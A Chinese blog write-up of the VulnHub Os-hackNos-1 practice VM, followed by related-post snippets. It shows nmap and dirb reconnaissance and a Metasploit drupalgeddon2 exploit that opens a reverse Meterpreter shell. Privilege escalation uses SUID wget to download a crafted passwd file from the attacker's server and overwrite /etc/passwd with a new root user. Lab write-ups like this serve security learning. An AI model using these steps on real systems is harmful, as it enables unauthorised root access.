vulnhub靶机 Os-hackNos-1

原创 已于 2023-06-19 15:24:42 修改 · 235 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

于 2023-06-16 03:45:02 首次发布

下载靶机

地址:hackNos: Os-hackNos ~ VulnHub

问题阐述

本次使用的vitualbox虚拟机,因为用vmware打开镜像有问题,kali扫描不到靶机ip,按照网上方法进入编辑页面也失败了,最后看到网上说virtual打开没问题,但我用virtualbox导入镜像,用kali也就没扫到,最后尝试把kali和Os-hackNos-1都使用桥接模式,最后成功扫描到靶机

打靶目标

,官网任务是获得2个flag,可理解为获取靶机的root权限

打靶过程

1.查看kaliIP

ifconfig

2.nmap扫描存活主机

nmap -sP -sn -v 192.168.0.0/24

 3.对存活主机进行端口扫描

nmap -v -A -PN 172.20.10.9

 80端口用于HTTP服务,直接访问网站做web渗透

4.打开网站,发现是apache默认界面

直接做目录扫描,发现drupal

dirb http://172.20.10.9

 5.访问http://172.20.10.9/drupal,并发现版本信息drupal7

 6.msf搜索漏洞,并进行漏洞利用

msfconsole

msf6>search drupal

 利用exploit/unix/webapp/drupal_drupalgeddon2

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 172.20.10.9
rhost => 172.20.10.9
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set targeturi /drupal
targeturi => /drupal
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

 7.进行信息搜集,web权限,之后进行提权

提权

转换为交互式shell

shell

which python  //未发现python就寻找python3

which python3

python3 -c 'import pty; pty.spawn("/bin/bash")'

 查看哪些命令是root权限的

find / -perm -u=s -type f 2>/dev/null

 发现wget,于是可以通过wget重写/etc/passwd文件,来创建新的root用户

在kali上生成密码
perl -le 'print crypt("123456","addedsalt")'

 将 test:adrla7IBSfTZQ:0:0:test:/root:/bin/bash 写入到passwd 文件中

在kali上使用python搭建一个web服务器

python3 -m http.server 9999

最后使用wget命令远程下载替换

wget http://172.20.10.10:9999/passwd -O /etc/passwd

 至此输入 su test 再输入密码,发现为root权限

Vulnhub靶机练习笔记-Os-hackNos-1
2301_80115097的博客
04-10 938
现在提权的思路就是先下载靶机上的passwd,然后添加一个有root权限的用户到构造的passwd文件中,然后使用wget -O把构造的passwd内容重定向输入到原本的/etc/passwd中。dirb也扫一边,貌似dirb扫到的结果比dirsearch多,所以在实战的时候可以用多个不同的工具进行信息收集,这样才更全面。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。访问drupal目录,是一个登录界面,弱口令登录测试无果,换换别的思路。
VulnHubOs-hackNos-1
weixin_39219503的博客
12-22 595
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/hacknos-os-hacknos,401/ 题目信息如下,难度中等偏下,需要获取俩个flag Difficulty : Easy to Intermediate Flag : 2 Flag first user And second root Learning : exploit | Web Ap...
OS-HACKNOS-1
LainWith的博客
12-25 1184
目录介绍信息收集主机发现方法1网站探测目录扫描gobuster目录扫描查看drupal版本搜索EXPRCE-信息收集反弹shell目标1获取james的账密切换身份方法2网站探测dirb 目录扫描dirbuster挖掘drupal目录获取账号密码登录网站msf拿session提权目标2参考 介绍 难度:容易 ——> 中 flag: 两个, 一个是普通用户的user.txt、另外一个是root用户的user.txt 靶机的地址:https://www.vulnhub.com/entry/hacknos-
Vulnhub靶机HACKNOSOS-HACKNOS-2.1
LainWith的博客
02-05 3316
目录介绍信息收集主机发现主机信息探测网站探测目录扫描wpscan漏扫网站测试POC破解用户密码SSH登录破解用户密码Flag1提权-Flag2参考 介绍 系列: hackNos(此系列共7台) 发布日期:2020 年 118 日 难度:初级-中级 Flag : 2个,一个普通用户的,一个根用户的 学习: wordpress 安全测试 本地包含漏洞利用 john破解 特权提升 靶机地址:https://www.vulnhub.com/entry/hacknos-reconforce,416/ 信息收
HackNos-Os-hackNos-1靶机过关练习笔记
Abc_Kimball的博客
11-22 859
文章目录练习笔记:一,信息收集二,获取目标的shell三,权限维持四,提权root权限维持: Os-hackNos-1靶机 实验主机:kali linux虚拟机(VM) 实验靶机Os-hackNos-1靶机(Virtualbox) 实验网络:桥接模式 实验难度:简单 flag:1.普通用户的user.txt;2.root用户的user.txt 再深入是root权限维持,就是生成公钥,将kali的公钥放入Os-hackNos-1靶机里生成公钥文件ssh-keygen,后面意外翻车,就是无法成功顺利的在靶机
【渗透测试】-vulnhub源码框架漏洞-Os-hackNos-1
weixin_65311462的博客
09-18 1688
源码框架是指在软件开发过程中,为了提高开发效率、简化开发流程、提高代码质量和可靠性的基础架构和模板。若该框架中存在漏洞,hacker便可以此漏洞,迅速发起所谓的“1day攻击”-针对那些尚未应用相应安全补丁的、使用了该漏洞框架的网站或应用进行广泛而有效的渗透,严重威胁到用户数据的安全性和服务的稳定性。
kali 攻击靶机Os-HackNos-1
weixin_52525624的博客
02-21 2134
实验主机:Os-hackerNos靶机一台/Kali linux攻击机一台 实验网络:桥接网络 实验目标:获取靶机的Root权限 难易程度:简单 前期工作: 1:下载Virtualbox虚拟化软件 下载地址:https://www.virtualbox.org/wiki/Downloads 2:下载目标靶机并导入Virtualbox 下载地址:hackNos: Os-hackNos ~ VulnHubOs-hackNos-1.ova下载下来之后打开Virtualbox按下快捷键Ctrl
vulnhub靶机 Os-Hax
qq_52178795的博客
06-18 203
本篇重点,反弹shell awk提权
VulnHubOs-hackNos-3
weixin_39219503的博客
01-07 916
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/ 题目信息如下,难度中等,需要获取俩个flag Difficulty: Intermediate Flag: 2 Flag first user And the second root Learning: Web Application | Enume...
2020最新渗透测试靶机和工具及教程
05-30
搜集的渗透测试的靶场,有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场,全部封装在虚拟机中,渗透工具封装在另一虚拟机中。
oscp——Os-hackNos-2.1
王嘟嘟的博客
01-30 854
0x00 前言 这个是第十五台机子,这个机子是做了一小部分,然后才来写文章的。 E788B1E88081E5A986E5939F 链接 https://www.vulnhub.com/entry/hacknos-os-hacknos-21,403/ 0x01 信息收集 1.ip 2.端口 0x02 攻击 1.端口攻击 端口这边暂时没有可以出发的地方 2.web攻击 web访问一下 惯例扫目录...
vulnhub靶机练习-Os-hackNos-1
yyj1781572的博客
11-25 737
vulnhub靶机练习-Os-hackNos-1
vulnhub靶场,Os-hackNos-1
kukudeshuo的博客
07-18 641
vulnhub靶场,Os-hackNos-1 环境准备 攻击机:kali(192.168.58.130) 靶机Os-hackNos-1192.168.58.156) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.156 使用nmap扫描查看目标靶机端口开放情况 开放端口:22、80 浏览器访问目标靶机80端口 就是一个ubuntu系统的默认ht
【甄选靶场】Vulnhub百个项目渗透——项目四十九:Os-hackNos-2.1(lfi,密码爆破)
人间体佐菲的博客
10-23 1024
【甄选靶场】Vulnhub百个项目渗透——项目四十九:Os-hackNos-2.1(lfi,密码爆破)
搭建 Vulnhub 靶机环境及渗透
chinansa的博客
09-10 728
一般来说,内存大小可以根据你的物理机内存情况进行分配,但不宜过小,以免影响靶机的运行性能。在进行漏洞利用时,要注意合法性和道德规范,确保你的行为是在合法授权的范围内进行的。在你的物理机上,使用网络扫描工具(如 Nmap)扫描本地网络,查找靶机的 IP 地址。这一步的设置应尽量与靶机的实际操作系统相匹配,以便获得更好的兼容性。同时,你还可以尝试获取靶机上的敏感信息,如用户密码、文件内容等。在进行渗透测试时,要遵守法律法规和道德规范,确保你的行为是合法和安全的。在虚拟机的存储设置中,添加你下载的靶机镜像文件。
Os-hackNos-1复现
fjyyyyy7的博客
09-24 500
靶场IP:192.168.188.135kali本机IP:192.168.188.128。
渗透测试靶机镜像
weixin_61756962的博客
03-11 499
靶场安全
MacBook M1 VulnHub靶机搭建(arm Mac搭建x86 ova镜像)
qq_35664104的博客
07-17 2772
个人博客:自从换了M1系的arm Mac后,原本的Vulnhub上的几乎所有靶场按照之前的方法都无法正常搭建了(VirtualBox),在外网论坛上找了一遍,有一个相对麻烦一些的替代方法,但效果还是不错的,并且几乎所有Vulnhub上的x86靶场镜像都可以使用了。
vulnhub靶机AI-WEB1
最新发布
01-19
### 关于VulnHub靶机AI-WEB1的信息 针对VulnHub平台上的AI-WEB1靶机,该虚拟机旨在提供给有兴趣了解Web应用程序安全性的个人一种实践环境。通过这一挑战,参与者可以探索常见的Web应用漏洞以及如何利用这些弱点来获得系统的进一步访问权限。 #### 初始侦察阶段 在开始任何实际攻击之前,进行全面的情报搜集至关重要。这通常涉及到使用诸如`Nmap`这样的工具来进行端口扫描和服务版本检测: ```bash nmap -A <target_IP> ``` 上述命令能够揭示开放的服务及其潜在的安全配置缺陷[^3]。 #### Web服务器枚举 一旦确认目标运行着HTTP(S)服务,则应立即启动目录遍历尝试。可借助像`Dirb`或更现代的选择如`Gobuster`等工具完成这项工作: ```bash gobuster dir -u http://<target_ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ``` 此过程有助于发现隐藏页面和管理接口,它们可能是后续入侵的关键入口点。 #### 应用层挖掘 对于基于PHP构建的应用程序来说,源码泄露是一个常见问题。如果运气好,在上一步找到的路径里可能会存在`.php~`或其他临时文件形式暴露出来的代码片段。仔细审查这部分内容往往能带来意想不到的收获——比如硬编码凭证或是调试模式下的敏感信息泄漏。 #### 数据库交互测试 许多老旧CMS(内容管理系统)容易受到SQL注入的影响。当遇到带有查询参数的URL时,不妨试试经典的单引号闭合技巧;而对于表单提交,则可通过修改POST数据包中的字段名与值组合来进行试探性输入验证绕过[^8]。 #### 提升权限方法 成功突破前端防护之后,下一步便是考虑怎样扩大战果直至取得root shell。Linux系统下,检查SUID位设置不当的二进制文件是一项基本技能;而Windows环境中则需留意计划任务、注册表键值异常变动等情况。 #### Drupal特定注意事项 鉴于部分描述提及到Drupal CMS, 若确实如此的话,值得注意的是有关于此框架内核升级机制的一个已知特性:即管理员账户密码可以通过编辑数据库记录的方式实现重置而不依赖原有认证流程[^9]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凉城木槿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值